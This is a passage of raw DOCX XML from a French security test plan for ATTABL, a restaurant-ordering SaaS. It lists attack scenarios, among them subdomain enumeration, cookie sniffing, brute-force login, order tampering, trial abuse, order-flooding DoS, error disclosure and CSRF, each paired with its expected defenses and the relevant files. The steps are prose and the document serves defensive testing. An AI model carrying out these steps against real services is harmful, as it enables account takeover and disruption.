      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant essaie de decouvrir tous les sous-domaines actifs.</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Scanner les sous-domaines : test.attabl.com, restaurant.attabl.com, hotel.attabl.com...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Observer les reponses HTTP (200 vs 404 vs redirect)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Lister les tenants actifs en analysant les differences de reponse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Scraper les menus publics pour collecter les noms/adresses des restaurants</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Les menus publics sont par nature accessibles (c'est le QR code). Mais le dashboard admin doit retourner la meme reponse (redirect vers login) que le tenant existe ou non. Pas de difference observable entre tenant existant et inexistant.</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src/middleware.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/app/sites/[site]/page.tsx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-12 : Session Hijacking / Cookie Theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant vole le cookie de session d'un admin.</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Connecter un admin sur un reseau Wi-Fi public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Sniffer le trafic reseau avec Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Rechercher les cookies Supabase dans les requetes HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter de rejouer le cookie depuis un autre navigateur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Verifier les attributs des cookies : Secure, HttpOnly, SameSite</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HSTS force HTTPS (pas de sniffing possible). Les cookies Supabase ont Secure + HttpOnly + SameSite=Lax. Le replay depuis un autre navigateur devrait echouer si la session est liee au device.</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src/lib/supabase/server.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/lib/supabase/middleware.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-13 : Brute Force Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant tente de deviner le mot de passe d'un admin.</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Cibler un email admin connu (ex: admin@restaurant.com)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Envoyer 1000 tentatives de connexion avec des mots de passe differents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Verifier si le rate limiting bloque apres N tentatives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Verifier si le message d'erreur distingue "email inconnu" vs "mauvais mot de passe" (aide l'attaquant)</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 rate limiting bloque apres le seuil. Le message d'erreur est generique ("Identifiants incorrects") sans distinguer email/password.</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src/lib/rate-limit.ts (authLimiter)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- Supabase Auth config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-14 : Manipulation des commandes apres soumission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un client tente de modifier ou supprimer une commande deja envoyee en cuisine.</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Passer une commande normalement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Intercepter l'ID de la commande dans la reponse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Tenter un PUT /api/orders/{id} pour modifier les items</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Tenter un DELETE /api/orders/{id}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Verifier si un client peut annuler la commande d'un autre client au meme tenant</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Les commandes soumises ne sont pas modifiables par le client. Seul l'admin peut supprimer via server action avec verification de permissions.</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src/app/api/orders/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/app/actions/orders.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-15 : Abus de l'essai gratuit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un utilisateur cree des comptes multiples pour profiter indefiniment de l'essai 14 jours.</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Creer un compte avec email1@gmail.com -&gt; essai 14 jours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. A l'expiration, creer un nouveau compte avec email2@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Importer le meme menu, le meme QR code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Repeter indefiniment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Tenter avec des alias Gmail (email+1@gmail.com, email+2@gmail.com)</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Difficile a bloquer completement. Mitigations possibles : limiter par telephone (verification SMS), par adresse IP, ou par empreinte navigateur. Pour le MVP, accepter le risque - ces cas sont rares et couteux en temps pour l'abuseur.</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src/app/api/signup/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/services/signup.service.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-16 : Denial of Service (DoS) sur les commandes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC7700"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">MOYENNE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un attaquant envoie des milliers de fausses commandes pour surcharger un restaurant.</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Cibler le menu public d'un tenant (QR code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ecrire un script qui envoie 1000 commandes POST /api/orders en boucle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Avec des items valides et des prix corrects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Le restaurant recoit 1000 commandes bidon sur son KDS</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 rate limiting (orderLimiter: 20/min) devrait bloquer apres 20 commandes. Mais si l'attaquant utilise des IPs differentes, le rate limiting par IP ne suffit pas. Mitigation supplementaire : CAPTCHA sur les commandes publiques ou validation par numero de table.</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src/lib/rate-limit.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- src/app/api/orders/route.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Scenarios BASSE severite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-17 : Information Disclosure dans les erreurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="228B22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">BASSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Les messages d'erreur revelent des informations techniques (stack traces, versions, chemins).</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Envoyer des requetes malformees a chaque API route</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Envoyer un JSON invalide, un body vide, des types incorrects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Verifier si les reponses d'erreur contiennent des stack traces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Verifier si les headers revelent la version de Next.js ou Node.js</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Les erreurs retournent un message generique en production. Pas de stack trace. Les headers x-powered-by sont desactives.</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next.config.mjs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">- Sentry error handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SC-18 : CSRF sur les Server Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severite : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="228B22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">BASSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Un site malveillant declenche une action (suppression de menu) au nom de l'admin connecte.</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Creer une page malveillante avec un formulaire hidden qui POST vers une server action ATTABL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. L'admin visite la page malveillante pendant qu'il est connecte a ATTABL</w:t>
      </w:r>
    </w:p>
